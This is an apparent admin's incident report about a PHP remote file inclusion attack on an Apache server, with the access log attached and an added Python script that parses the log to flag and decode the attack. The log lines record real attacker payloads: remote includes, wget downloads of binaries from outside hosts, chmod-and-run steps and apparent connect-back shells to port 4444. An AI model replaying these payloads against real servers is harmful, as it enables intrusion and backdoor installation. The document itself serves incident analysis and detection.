
Attack using php+apache



Today the server was attacked using php+apache. Some user had a
'require $area.php' in his index.php file. Using this, the attacker
could execute some commands, like entering the /tmp folder and downloading
some files. Then he tried to execute a telnetd daemon with no success. The
attachment is the Apache log containing the important parts. I don't
think that he did anything more than that, but I would like to know more
about this. I appreciate any help.
200.214.140.237 - - [15/Nov/2003:00:19:09 -0200] "GET /~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=id;uname%20-a HTTP/1.1" 200 4117 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.140.237 - - [15/Nov/2003:00:19:10 -0200] "GET /~joeuser/estilos.css HTTP/1.1" 200 2581 "http://lia.ufc.br/~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=id;uname%20-a" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.140.237 - - [15/Nov/2003:00:19:10 -0200] "GET /~joeuser/imagens/fox.gif HTTP/1.1" 200 3531 "http://lia.ufc.br/~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=id;uname%20-a" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.140.237 - - [15/Nov/2003:00:19:10 -0200] "GET /~joeuser/imagens/topo.gif HTTP/1.1" 200 339 "http://lia.ufc.br/~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=id;uname%20-a" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.140.237 - - [15/Nov/2003:00:19:10 -0200] "GET /favicon.ico HTTP/1.1" 404 288 "http://lia.ufc.br/~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=id;uname%20-a" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.140.237 - - [15/Nov/2003:00:20:05 -0200] "GET /~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;ls HTTP/1.1" 200 4279 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.140.237 - - [15/Nov/2003:00:20:24 -0200] "GET /~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;wget%20www.indexlhr.hpg.com.br/c4 HTTP/1.1" 200 4723 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.140.237 - - [15/Nov/2003:00:20:25 -0200] "GET /~joeuser/estilos.css HTTP/1.1" 304 - "http://lia.ufc.br/~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;wget%20www.indexlhr.hpg.com.br/c4" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.140.237 - - [15/Nov/2003:00:20:26 -0200] "GET /~joeuser/imagens/fox.gif HTTP/1.1" 304 - "http://lia.ufc.br/~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;wget%20www.indexlhr.hpg.com.br/c4" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.140.237 - - [15/Nov/2003:00:20:26 -0200] "GET /~joeuser/imagens/topo.gif HTTP/1.1" 304 - "http://lia.ufc.br/~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;wget%20www.indexlhr.hpg.com.br/c4" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.140.237 - - [15/Nov/2003:00:20:26 -0200] "GET /favicon.ico HTTP/1.1" 404 288 "http://lia.ufc.br/~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;wget%20www.indexlhr.hpg.com.br/c4" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.140.237 - - [15/Nov/2003:00:20:40 -0200] "GET /~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;chmod%207777%20c4;./c4 HTTP/1.1" 200 4110 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.140.237 - - [15/Nov/2003:00:39:49 -0200] "GET /~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;wget%20www.indexlhr.hpg.com.br/db HTTP/1.1" 200 4718 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.140.237 - - [15/Nov/2003:00:41:26 -0200] "GET /~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;chmod%207777%20bd;./bd%20200.214.140.237%204444 HTTP/1.1" 200 4038 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.140.237 - - [15/Nov/2003:00:41:56 -0200] "GET /~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;chmod%207777%20bd; HTTP/1.1" 200 3999 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.140.237 - - [15/Nov/2003:00:42:10 -0200] "GET /~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;./bd%20200.214.140.237%204444 HTTP/1.1" 200 4038 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.140.237 - - [15/Nov/2003:00:42:21 -0200] "GET /~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;ls HTTP/1.1" 200 4291 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.140.237 - - [15/Nov/2003:00:42:39 -0200] "GET /~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;./db%20./bd%20200.214.140%204444 HTTP/1.1" 200 4019 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.140.237 - - [15/Nov/2003:00:43:39 -0200] "GET /~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;chmod%207777%20db;./db%20./bd%20200.214.140%204444 HTTP/1.1" 200 4058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.140.237 - - [15/Nov/2003:00:48:00 -0200] "GET /~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;./db%20200.214.140.237%204444 HTTP/1.1" 200 4112 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.140.237 - - [15/Nov/2003:00:49:44 -0200] "GET /~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;./db%20200.214.140.237%204444 HTTP/1.1" 200 3999 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.140.237 - - [15/Nov/2003:00:53:12 -0200] "GET /~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;wget%20http://lia.ufc.br/~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;wget%20www.zueirareri.hpg.com.br/telnetd HTTP/1.1" 200 5007 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.140.237 - - [15/Nov/2003:00:53:45 -0200] "GET /~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;wget%20http://lia.ufc.br/~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;chmod%207777%20telnetd;./telnetd HTTP/1.1" 200 3999 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.140.237 - - [15/Nov/2003:00:55:16 -0200] "GET /~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;./db%20200.214.140.237%204444 HTTP/1.1" 200 3999 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.147.121.153 - - [15/Nov/2003:01:29:07 -0200] "GET /~joeuser HTTP/1.1" 301 318 "-" "Mozilla/5.0 (compatible; Konqueror/2.2.2; Linux)"
200.147.121.153 - - [15/Nov/2003:01:29:08 -0200] "GET /~joeuser/ HTTP/1.1" 200 4096 "-" "Mozilla/5.0 (compatible; Konqueror/2.2.2; Linux)"
200.147.121.153 - - [15/Nov/2003:01:29:13 -0200] "GET /~joeuser/estilos.css HTTP/1.1" 200 2581 "http://www.lia.ufc.br/~joeuser/" "Mozilla/5.0 (compatible; Konqueror/2.2.2; Linux)"
200.147.121.153 - - [15/Nov/2003:01:29:13 -0200] "GET /~joeuser/imagens/topo.gif HTTP/1.1" 200 339 "http://www.lia.ufc.br/~joeuser/" "Mozilla/5.0 (compatible; Konqueror/2.2.2; Linux)"
200.147.121.153 - - [15/Nov/2003:01:29:13 -0200] "GET /~joeuser/imagens/fox.gif HTTP/1.1" 200 3531 "http://www.lia.ufc.br/~joeuser/" "Mozilla/5.0 (compatible; Konqueror/2.2.2; Linux)"
200.147.121.153 - - [15/Nov/2003:01:29:20 -0200] "GET /favicon.ico HTTP/1.1" 404 288 "-" "Mozilla/5.0 (compatible; Konqueror/2.2.2; Linux)"
200.147.121.153 - - [15/Nov/2003:01:51:47 -0200] "GET /~joeuser HTTP/1.1" 301 318 "-" "Mozilla/5.0 (compatible; Konqueror/2.2.2; Linux)"
200.147.121.153 - - [15/Nov/2003:01:51:48 -0200] "GET /~joeuser/ HTTP/1.1" 200 4096 "-" "Mozilla/5.0 (compatible; Konqueror/2.2.2; Linux)"
200.147.121.153 - - [15/Nov/2003:02:13:53 -0200] "GET /~joeuser HTTP/1.1" 301 318 "-" "Mozilla/5.0 (compatible; Konqueror/2.2.2; Linux)"
200.147.121.153 - - [15/Nov/2003:02:13:54 -0200] "GET /~joeuser/ HTTP/1.1" 200 3491 "-" "Mozilla/5.0 (compatible; Konqueror/2.2.2; Linux)"
200.147.121.153 - - [15/Nov/2003:02:14:45 -0200] "GET /~joeuser/index.txt HTTP/1.1" 200 3612 "-" "Mozilla/5.0 (compatible; Konqueror/2.2.2; Linux)"
200.214.138.79 - - [15/Nov/2003:09:01:51 -0200] "GET /~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=id;uname%20-a HTTP/1.1" 200 3491 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.138.79 - - [15/Nov/2003:09:01:52 -0200] "GET /~joeuser/estilos.css HTTP/1.1" 200 2581 "http://lia.ufc.br/~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=id;uname%20-a" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.138.79 - - [15/Nov/2003:09:01:53 -0200] "GET /favicon.ico HTTP/1.1" 404 288 "http://lia.ufc.br/~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=id;uname%20-a" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.138.79 - - [15/Nov/2003:09:01:53 -0200] "GET /~joeuser/imagens/topo.gif HTTP/1.1" 200 339 "http://lia.ufc.br/~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=id;uname%20-a" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.138.79 - - [15/Nov/2003:09:01:54 -0200] "GET /~joeuser/imagens/fox.gif HTTP/1.1" 200 3531 "http://lia.ufc.br/~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=id;uname%20-a" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.138.79 - - [15/Nov/2003:09:02:46 -0200] "GET /~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=id HTTP/1.1" 200 3491 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.147.146.16 - - [15/Nov/2003:16:04:04 -0200] "GET /~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=id;uname%20-a HTTP/1.1" 200 3491 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.147.146.16 - - [15/Nov/2003:16:04:05 -0200] "GET /~joeuser/estilos.css HTTP/1.1" 200 2581 "http://lia.ufc.br/~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=id;uname%20-a" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.147.146.16 - - [15/Nov/2003:16:04:06 -0200] "GET /~joeuser/imagens/fox.gif HTTP/1.1" 200 3531 "http://lia.ufc.br/~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=id;uname%20-a" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.147.146.16 - - [15/Nov/2003:16:04:06 -0200] "GET /~joeuser/imagens/topo.gif HTTP/1.1" 200 339 "http://lia.ufc.br/~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=id;uname%20-a" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.147.146.16 - - [15/Nov/2003:16:04:20 -0200] "GET /~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=id HTTP/1.1" 200 3491 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
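An added example, not part of the original post or its attachment: the Python script below parses Apache combined-format lines like the ones above, flags requests whose query parameter carries a remote URL (the area=http://... value that require "$area.php" fetches and executes when allow_url_fopen is on, which was the PHP 4 default), decodes the cmd values and lists what was pulled onto the box with wget. It also shows why the trailing "?" in the area value matters: the ".php" that index.php appends becomes the query string of the remote URL, so bywordonline.com still serves app.txt unchanged. The embedded sample log consists of four lines copied from the post plus one constructed benign request; the log regex (combined format), the cmd parameter name (taken from the log, it belongs to the included script, not to index.php) and the connect-back heuristic (a staged binary run with the requesting IP and a port as arguments) are assumptions of this example.

```python
"""Triage helper for the Apache access log posted above: finds requests that feed a
remote URL into a PHP include, decodes the attacker's commands and rebuilds a
timeline. Added example, not part of the original post."""
import re
from urllib.parse import unquote, urlsplit

# Apache "combined" log format (assumed; that is what the posted lines look like).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
REMOTE_SCHEMES = ("http://", "https://", "ftp://")

# Four lines copied from the post (first probe, a CSS fetch whose Referer carries
# the payload, the wget stage, the 'bd' launch) plus one constructed benign request
# so the detector has something to ignore.
SAMPLE_LOG = """\
200.214.140.237 - - [15/Nov/2003:00:19:09 -0200] "GET /~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=id;uname%20-a HTTP/1.1" 200 4117 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.140.237 - - [15/Nov/2003:00:19:10 -0200] "GET /~joeuser/estilos.css HTTP/1.1" 200 2581 "http://lia.ufc.br/~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=id;uname%20-a" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.140.237 - - [15/Nov/2003:00:20:24 -0200] "GET /~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;wget%20www.indexlhr.hpg.com.br/c4 HTTP/1.1" 200 4723 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.140.237 - - [15/Nov/2003:00:41:26 -0200] "GET /~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;chmod%207777%20bd;./bd%20200.214.140.237%204444 HTTP/1.1" 200 4038 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
10.0.0.5 - - [15/Nov/2003:01:00:00 -0200] "GET /~joeuser/index.php?area=home HTTP/1.1" 200 3491 "-" "Mozilla/5.0 (constructed benign request)"
"""


def parse_query(query):
    """Split a query string the way PHP does: on '&' only, percent-decoding both
    sides, last duplicate wins. urllib.parse.parse_qs also split on ';' before
    Python 3.9.2, which would cut 'id;uname -a' in half."""
    params = {}
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params[unquote(key)] = unquote(value)
    return params


def parse_line(line):
    """Return a dict for one combined-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["params"] = parse_query(parts.query)
    return rec


def find_rfi(params):
    """Parameters whose value is a remote URL: candidates for include/require."""
    return [(k, v) for k, v in params.items() if v.lower().startswith(REMOTE_SCHEMES)]


def effective_include(area, suffix=".php"):
    """What require "$area.php" really fetches. The attacker's trailing '?' pushes
    the appended suffix into the query string, so the remote host still serves
    app.txt and PHP executes whatever it contains."""
    url = area + suffix
    parts = urlsplit(url)
    return url, parts.path, parts.query


def triage(log_text):
    """One event per request that includes a remote URL, with the decoded cmd."""
    events = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = find_rfi(rec["params"])
        if not hits:
            continue
        param, url = hits[0]
        events.append({
            "ts": rec["ts"], "ip": rec["ip"], "status": rec["status"],
            "include_param": param, "include_url": url,
            "cmd": rec["params"].get("cmd"),
        })
    return events


def staged_files(events):
    """Everything the attacker pulled onto the box with wget."""
    return [m.group(1) for e in events if e["cmd"]
            for m in re.finditer(r"wget\s+(\S+)", e["cmd"])]


def connect_back_hints(events):
    """Commands that run a staged binary with the *requesting* IP and a port as
    arguments; a hint (not proof) of a connect-back shell like './bd <ip> <port>'."""
    hint_re = re.compile(r"\./\S+\s+(\d{1,3}(?:\.\d{1,3}){3})\s+(\d{1,5})\b")
    hints = []
    for e in events:
        m = hint_re.search(e["cmd"] or "")
        if m and m.group(1) == e["ip"]:
            hints.append((e["ts"], m.group(1), m.group(2)))
    return hints


if __name__ == "__main__":
    events = triage(SAMPLE_LOG)
    for e in events:
        print(e["ts"], e["ip"], e["status"], e["cmd"])
    print("staged:", staged_files(events))
    print("connect-back hints:", connect_back_hints(events))
    print("effective include:", effective_include("http://bywordonline.com/sc/app.txt?"))
```

Run it against the full access log instead of SAMPLE_LOG to get the whole sequence; in the posted lines every injection request returned 200 with a few kB of body, which is consistent with the include succeeding and the command running as the Apache user. The CSS and image fetches carry the same payload in the Referer, so grepping for "area=http" across all fields, not only the request line, catches the browser follow-ups as well.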
